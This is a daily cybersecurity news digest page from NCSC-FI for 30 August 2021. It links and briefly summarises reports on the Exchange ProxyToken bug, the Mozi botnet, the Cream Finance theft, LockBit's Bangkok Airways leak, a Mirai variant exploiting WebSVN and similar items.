Daily NCSC-FI news followup 2021-08-30

Hackers, tractors, and a few delayed actors. How hacker Sick Codes learned too much about John Deere: Lock and Code S02E16

blog.malwarebytes.com/podcast/2021/08/hackers-tractors-and-a-few-delayed-actors-how-hacker-sick-codes-learned-too-much-about-john-deere-lock-and-code-s02e16/ No one ever wants a group of hackers to say about their company: We had the keys to the kingdom.. But thats exactly what the hacker Sick Codes said on this weeks episode of Lock and Code, in speaking with host David Ruiz, when talking about his and fellow hackers efforts to peer into John Deeres data operations center, where the company receives a near-endless stream of data from its Internet-connected tractors, combines, and other smart farming equipment.

The Mostly Dead Mozi and Its Lingering Bots

blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ It has been nearly 2 years since we (360NETLAB) first disclosed the Mozi botnet in December 2019, and in that time we have witnessed its development from a small-scale botnet to a giant that accounted for an extremely high percentage of IOT traffic at its peak. Now that Mozi’s authors have been taking custody by law enforcement agencies, in which we provided technical assistance throughout, we don’t think it will continue to be updated for quite some time to come. But we know that Mozi uses a P2P network structure, and one of the “advantages” of a P2P network is that it is robust, so even if some of the nodes go down, the whole network will carry on, and the remaining nodes will still infect other vulnerable devices, that is why we can still see Mozi spreading.

Microsoft Exchange ProxyToken bug can let hackers steal user email

www.bleepingcomputer.com/news/security/microsoft-exchange-proxytoken-bug-can-let-hackers-steal-user-email/ Technical details have emerged on a serious vulnerability in Microsoft Exchange Server dubbed ProxyToken that does not require authentication to access emails from a target account. An attacker can exploit the vulnerability by crafting a request to web services within the Exchange Control Panel (ECP) application and steal messages from a victims inbox.. Also:



CISA Adds Single-Factor Authentication to list of Bad Practices

us-cert.cisa.gov/ncas/current-activity/2021/08/30/cisa-adds-single-factor-authentication-list-bad-practices Today, CISA added the use of single-factor authentication for remote or administrative access systems to our Bad Practices list of exceptionally risky cybersecurity practices. Single-factor authentication is a common low-security method of authentication. It only requires matching one factorsuch as a passwordto a username to gain access to a system.

Hackers steal $29 million from crypto-platform Cream Finance

therecord.media/hackers-steal-29-million-from-crypto-platform-cream-finance/ Hackers are estimated to have stolen more than $29 million in cryptocurrency assets from Cream Finance, a decentralized finance (DeFi) platform that allows users to loan and speculate on cryptocurrency price variations. The company confirmed the hack earlier today, half an hour after blockchain security firm PeckShield noticed signs of an ongoing attack. C.R.E.A.M. v1 market on Ethereum has suffered an exploit, resulting in a loss of 418,311,571 in AMP and 1,308.09 in ETH, by way of reentrancy on the AMP token contract.

Cryptocurrency Clipboard Swapper Delivered With Love

isc.sans.edu/forums/diary/Cryptocurrency+Clipboard+Swapper+Delivered+With+Love/27794/ Be careful if you’re a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I’m talking here about technical risk. Wallet addresses are long strings of characters that are pretty impossible to use manually. It means that you’ll use your clipboard to copy/paste your wallets to perform payments. But some malware monitors your clipboard for “interesting data” (like wallet addresses) and tries to replace it with another one.

QNAP works on patches for OpenSSL bugs impacting its NAS devices

www.bleepingcomputer.com/news/security/qnap-works-on-patches-for-openssl-bugs-impacting-its-nas-devices/ Network-attached storage (NAS) maker QNAP is investigating and working on security updates to address remote code execution (RCE) and denial-of-service (DoS) vulnerabilities patched by OpenSSL last week. The security flaws tracked as CVE-2021-3711 and CVE-2021-3712, impact QNAP NAS device running QTS, QuTS hero, QuTScloud, and HBS 3 Hybrid Backup Sync (a backup and disaster recovery app), according to advisories published earlier today.

LockBit Gang to Publish 103GB of Bangkok Air Customer Data

threatpost.com/microsoft-exchange-proxytoken-email/169030/ The LockBit ransomware gang has apparently struck again, having purportedly stolen 103GB worth of files from Bangkok Airways and promising to release them tomorrow, on Tuesday. A Dark Web intelligence firm calling itself DarkTracer (apparently a separate intel firm than the better-known DarkTrace) tweeted a screen capture of a countdown clock from LockBit 2.0 that, as of Friday, showed four and a half days left.. Also:


Kansalaisia huijataan jälleen viran­omainen varoittaa porno­kiristyksestä

www.is.fi/digitoday/tietoturva/art-2000008228312.html SUOMALAISIA jo vuosien ajan häirinnyt pornokiristys ei ota helpottaakseen. Traficomin alainen Kyberturvallisuuskeskus päivitti artikkeliaan aiheesta maanantaina ja korosti, että näitä aikuisviihdeteemaisia kiristysviestejä on edelleen runsaasti liikkeellä. Viesteissä huijari väittää kuvanneensa viestin vastaanottajaa salaa tämän vieraillessa aikuisviihdesivuilla käyttämällä laitteelle asennettua haittaohjelmaa. Kuitenkaan mitään ei ole kuvattu, eikä haittaohjelmaa ole. Huijarille ei pidä maksaa mitään, ja viestit voi yksinkertaisesti poistaa.

House defense policy bill okays $10.4 billion for DoD cybersecurity

therecord.media/house-defense-policy-bill-okays-10-4-billion-for-dod-cybersecurity/ The House version of the annual defense policy bill backs the Biden administrations proposed $10.4 billion cybersecurity budget for the Defense Department next year, according to an aide for the panels Democratic majority. We support the Presidents budget request, the aide said, adding that the annual National Defense Authorization Act provides additional investment for the protection of the Pentagons information systems. A summary of the bill shows an additional $50 million for such work.

The Underground Economy: Recon, Weaponization & Delivery for Account Takeovers

threatpost.com/underground-economy-account-takeovers/169032/ In part one of a two-part series, Akamais director of security technology and strategy, Tony Lauro, lays out what orgs need to know to defend against account takeover attacks. With account takeover (ATO) attacks on the rise, stopping threat actors in the early phases of the kill chain will help todays defenders gain an upper hand against direct fraud campaigns. Understanding how and where these attacks are carried out and the underlying support structure enabling ATO are key to informing what types of defenses should be deployed to help reduce an organizations risk and associated pain for customer account compromise.

10 Reasons to Trust Your Enterprise APIs

blogs.cisco.com/security/10-reasons-to-trust-your-enterprise-apis Recently one of the big-three consumer credit bureaus fixed an issue that allowed an ordinary user to obtain the credit score of tens of millions of Americans just by providing their name and mailing address. The connective tissue making this data exposure possible was an Application Programming Interface or API. An API enables two pieces of software to communicate with each other. Just think about the different ways you interface with software. You might open a web interface to access email or launch your favorite social media app to connect with friends. Each of these workflows is more than likely using an API and has a distinct interface or way in which you achieve a particular task.

How Apple plans to monitor users

www.kaspersky.com/blog/what-is-apple-csam-detection/41502/ In early August 2021, Apple unveiled its new system for identifying photos containing images of child abuse. Although Apples motives combating the dissemination of child pornography seem indisputably well-intentioned, the announcement immediately came under fire. Apple has long cultivated an image of itself as a device maker that cares about user privacy. New features anticipated for iOS 15 and iPadOS 15 have already dealt a serious blow to that reputation, but the company is not backing down. Heres what happened and how it will affect average users of iPhones and iPads.

New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)

unit42.paloaltonetworks.com/cve-2021-32305-websvn/ We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source code. The critical command injection vulnerability was discovered and patched in May 2021. A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware. We strongly recommend that WebSVN users upgrade to the latest software version.

You might be interested in …

[NCSC-FI News] Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys

We recently observed a number of apps on Google Play designed to perform malicious activities such as stealing user credentials and other sensitive user information, including private keys Because of the number and popularity of these apps – some of them have been installed over a hundred thousand times – we decided to shed some […]

Read More

Daily NCSC-FI news followup 2021-05-14

[The Irish Health Service Executive] shuts down IT systems amid significant cyber attack www.irishtimes.com/news/health/hse-shuts-down-it-systems-amid-significant-cyber-attack-1.4564957 There has been a significant ransomware attack on the Health Service Executives (HSE) IT systems.. The HSE said it has taken the precaution of shutting down all its IT systems in order to protect them from this attack and to allow […]

Read More

Daily NCSC-FI news followup 2020-08-23

Remote Desktop (TCP/3389) and Telnet (TCP/23), What might they have in Common? isc.sans.edu/forums/diary/Remote+Desktop+TCP3389+and+Telnet+TCP23+What+might+they+have+in+Common/26492/ I’m glad you asked. I’m always interested in trends and reviewing the activity capture by my honeypot over this past week, it shows that no matter what port the RDP service is listening on, a specific RDP string (Cookie: mstshash=) might be […]

Read More

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.